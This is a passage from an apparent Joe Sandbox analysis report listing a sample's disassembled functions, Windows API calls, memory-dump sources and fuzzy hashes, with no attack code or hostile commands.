                                                                                                                    Function 00B89F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetEndOfFile.KERNELBASE(?,00B8903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00B89F0C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 749574446-0
                                                                                                                    • Opcode ID: 1d1b14bf9d52413ddf677528d468fc9d15394a67cb1ae9a91e4f93d4cc95f85f
                                                                                                                    • Instruction ID: efa642f9cc80de6fcbb483b06bc66489c29a4549bd32fc18fc20fa1ba3bcb6f6
                                                                                                                    • Opcode Fuzzy Hash: 1d1b14bf9d52413ddf677528d468fc9d15394a67cb1ae9a91e4f93d4cc95f85f
                                                                                                                    • Instruction Fuzzy Hash: 68A0113008000A8B8E002B30CA0820C3B20EB20BC030202A8A00ACB0A2CB22880B8A00
                                                                                                                    Function 00B9AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00B9AE72,C:\Users\user\Desktop,00000000,00BC946A,00000006), ref: 00B9AC08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611563598-0
                                                                                                                    • Opcode ID: ddee3af798135a550012717f82ed4a7f240dc85b8b3333a8b918d4a4d6fd0db5
                                                                                                                    • Instruction ID: 31e1e44932376f10d013f1338c0e041a526fbc5d40db5b7d4b1860060424ed68
                                                                                                                    • Opcode Fuzzy Hash: ddee3af798135a550012717f82ed4a7f240dc85b8b3333a8b918d4a4d6fd0db5
                                                                                                                    • Instruction Fuzzy Hash: F3A01130200200AB83000B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C820AA00
                                                                                                                    Function 00B89620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00B895D6,?,?,?,?,?,00BB2641,000000FF), ref: 00B8963B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: de93bb1dfb687712f18628f6cb8f2cdaf511276b06d10412cf4fba12c6446d33
                                                                                                                    • Instruction ID: e81bb9663af6540c5a479ea7a72fa3421226c123b161cac523b91010787c5d96
                                                                                                                    • Opcode Fuzzy Hash: de93bb1dfb687712f18628f6cb8f2cdaf511276b06d10412cf4fba12c6446d33
                                                                                                                    • Instruction Fuzzy Hash: 70F05E71486B159FDF31AE24C458BA2B7E8EB12325F081B9E90E6429F0E761698DCB40

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00B9C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00B81316: GetDlgItem.USER32(00000000,00003021), ref: 00B8135A
                                                                                                                      • Part of subcall function 00B81316: SetWindowTextW.USER32(00000000,00BB35F4), ref: 00B81370
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B9C2B1
                                                                                                                    • EndDialog.USER32(?,00000006), ref: 00B9C2C4
                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 00B9C2E0
                                                                                                                    • SetFocus.USER32(00000000), ref: 00B9C2E7
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B9C321
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B9C358
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00B9C36E
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B9C38C
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9C39C
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9C3B8
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9C3D4
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C404
                                                                                                                      • Part of subcall function 00B84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B840A5
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B9C417
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00B9C41E
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C477
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B9C48A
                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B9C4A7
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B9C4C7
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B9C4D7
                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B9C4F1
                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B9C509
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C535
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B9C548
                                                                                                                    • _swprintf.LIBCMT ref: 00B9C59C
                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B9C5AF
                                                                                                                      • Part of subcall function 00B9AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B9AF35
                                                                                                                      • Part of subcall function 00B9AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BBE72C,?,?), ref: 00B9AF84
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                    • Opcode ID: cddd60cac488815abd247c4c27a5cad20675695df021f6242be58067b6434f83
                                                                                                                    • Instruction ID: 264653d1702544dd02a065b88e0af690da9da0e9e0a2fb6c4a165d0fb5d849ea
                                                                                                                    • Opcode Fuzzy Hash: cddd60cac488815abd247c4c27a5cad20675695df021f6242be58067b6434f83
                                                                                                                    • Instruction Fuzzy Hash: EB918472148344BFD621ABA4CC89FFB7BECEB4AB00F444869F649D7091DB75E6048762
                                                                                                                    Function 00B86FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B86FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00B87013
                                                                                                                    • _wcslen.LIBCMT ref: 00B87084
                                                                                                                      • Part of subcall function 00B87A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B87AAB
                                                                                                                      • Part of subcall function 00B87A9C: GetLastError.KERNEL32 ref: 00B87AF1
                                                                                                                      • Part of subcall function 00B87A9C: CloseHandle.KERNEL32(?), ref: 00B87B00
                                                                                                                      • Part of subcall function 00B8A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641,000000FF), ref: 00B8A1F1
                                                                                                                      • Part of subcall function 00B8A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00B8977F,?,?,00B895CF,?,?,?,?,?,00BB2641), ref: 00B8A21F
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00B87139
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B87155
                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B87298
                                                                                                                      • Part of subcall function 00B89DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B873BC,?,?,?,00000000), ref: 00B89DBC
                                                                                                                      • Part of subcall function 00B89DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00B89E70
                                                                                                                      • Part of subcall function 00B89620: CloseHandle.KERNELBASE(000000FF,?,?,00B895D6,?,?,?,?,?,00BB2641,000000FF), ref: 00B8963B
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A501
                                                                                                                      • Part of subcall function 00B8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B8A325,?,?,?,00B8A175,?,00000001,00000000,?,?), ref: 00B8A532
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                    • API String ID: 3983180755-3508440684
                                                                                                                    • Opcode ID: e12deb0ac3c44588bc2dadd454643df6b46f5127512ff000d1fb3d8d4c9eb257
                                                                                                                    • Instruction ID: 0b93cebaca456bdc025b1a34c2dd4c72a9711c79d08f72b3f0a4a62264acb86e
                                                                                                                    • Opcode Fuzzy Hash: e12deb0ac3c44588bc2dadd454643df6b46f5127512ff000d1fb3d8d4c9eb257
                                                                                                                    • Instruction Fuzzy Hash: 0AC1C371944604AADB25FB74CC81FEEB3E8EF05304F14459AF956E32A2DB70EA44CB61
                                                                                                                    Function 00BAD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __floor_pentium4
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 4168288129-2761157908
                                                                                                                    • Opcode ID: a0f3048445bd9e5210761ec0faa129534a0f97e332367ee46c37abff0f6aab06
                                                                                                                    • Instruction ID: 6854e8c45e8e95ad5ebb98374a1a9cbe1add17239ade46156d4e2a86755cb636
                                                                                                                    • Opcode Fuzzy Hash: a0f3048445bd9e5210761ec0faa129534a0f97e332367ee46c37abff0f6aab06
                                                                                                                    • Instruction Fuzzy Hash: 3FC24C71E086288FDB25CE28DD807EAB7F5EB4A314F1541EAD45EE7240E775AE818F40
                                                                                                                    Function 00B832F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog_swprintf
                                                                                                                    • String ID: CMT$h%u$hc%u
                                                                                                                    • API String ID: 146138363-3282847064
                                                                                                                    • Opcode ID: b53d8d7875c552dbf824d3fc93227ed9260e8ccc311ec4a299f348b81ae838e0
                                                                                                                    • Instruction ID: 812d633061054f1b8ca7ebfec6f9ee491fd1cc1887ab0cd742572172eba2f2c6
                                                                                                                    • Opcode Fuzzy Hash: b53d8d7875c552dbf824d3fc93227ed9260e8ccc311ec4a299f348b81ae838e0
                                                                                                                    • Instruction Fuzzy Hash: 9D32D6B15142849FDF14EF74C895AE93BE5EF15B00F0804BDFD8A8B292DB749A49CB60
                                                                                                                    Function 00B8286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B82874
                                                                                                                    • _strlen.LIBCMT ref: 00B82E3F
                                                                                                                      • Part of subcall function 00B902BA: __EH_prolog.LIBCMT ref: 00B902BF
                                                                                                                      • Part of subcall function 00B91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8BAE9,00000000,?,?,?,0001040E), ref: 00B91BA0
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B82F91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                    • String ID: CMT
                                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                                    • Opcode ID: 2fac716011019dbff1c0d0ae4c41174fc3d738fdd72243215f70163455a3670f
                                                                                                                    • Instruction ID: d147d170b1ef058ddceedee5b5c37b13c0bbec4739263ada628ae4d84ac17b7c
                                                                                                                    • Opcode Fuzzy Hash: 2fac716011019dbff1c0d0ae4c41174fc3d738fdd72243215f70163455a3670f
                                                                                                                    • Instruction Fuzzy Hash: 1E62F5715006458FDF19EF38C8867EA3BE1EF55300F0845BEEC9A8B2A2DB759945CB60
                                                                                                                    Function 00B9F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B9F844
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B9F910
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B9F930
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00B9F93A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 254469556-0
                                                                                                                    • Opcode ID: 804c4fb853597e9f20cad4692871764bd52520486c401e8890cef78ab6e74055
                                                                                                                    • Instruction ID: 6e348d1fee1bfcf6f6f0ed28997b78e73a2f9c06a678a512da032b7383fe7a40
                                                                                                                    • Opcode Fuzzy Hash: 804c4fb853597e9f20cad4692871764bd52520486c401e8890cef78ab6e74055
                                                                                                                    • Instruction Fuzzy Hash: 62311475D052199BDF20DFA4D989BCCBBF8AF08704F1041EAE40CAB250EBB19B848F44
                                                                                                                    Function 00B9E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualQuery.KERNEL32(80000000,00B9E5E8,0000001C,00B9E7DD,00000000,?,?,?,?,?,?,?,00B9E5E8,00000004,00BE1CEC,00B9E86D), ref: 00B9E6B4
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00B9E5E8,00000004,00BE1CEC,00B9E86D), ref: 00B9E6CF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 401686933-2746444292
                                                                                                                    • Opcode ID: abbc3c7f4727ba6c072c705727ff5fc3b8ccebad4757074f717fc8abd0ea5248
                                                                                                                    • Instruction ID: 855eec604e6e7dc3c3d08840eb5640a546f33ddd9d82d9edeebed18af34af84f
                                                                                                                    • Opcode Fuzzy Hash: abbc3c7f4727ba6c072c705727ff5fc3b8ccebad4757074f717fc8abd0ea5248
                                                                                                                    • Instruction Fuzzy Hash: 9101F732600109ABDF14DE69DC49BDD7BEAEFC4324F0CC264ED29D7150EA38ED058680
                                                                                                                    Function 00BA8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BA8FB5
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BA8FBF
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00BA8FCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3906539128-0
                                                                                                                    • Opcode ID: 0f1f02c2f6b512772fa64c5dc029dda1332cf83ff1f04b822070743b4c61218e
                                                                                                                    • Instruction ID: 6d744e67004a5d275401664556095f155eb578a511b8657e30c6966f5e3dbd24
                                                                                                                    • Opcode Fuzzy Hash: 0f1f02c2f6b512772fa64c5dc029dda1332cf83ff1f04b822070743b4c61218e
                                                                                                                    • Instruction Fuzzy Hash: 3E31C475901219ABCB21DF69DC89B9DBBF8EF08310F5042EAE41CA7250EB709F858F44
                                                                                                                    Function 00BAB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    • Opcode ID: 79ff8f8178f7bba501bdc1c5c2b55d67cb9a3d204918ecffd592acaa46c38d79
                                                                                                                    • Instruction ID: cde90d2c449bb9bc895a01b64eceb9dd0ad4f35f7e444996bd8acdedb8f9ebb1
                                                                                                                    • Opcode Fuzzy Hash: 79ff8f8178f7bba501bdc1c5c2b55d67cb9a3d204918ecffd592acaa46c38d79
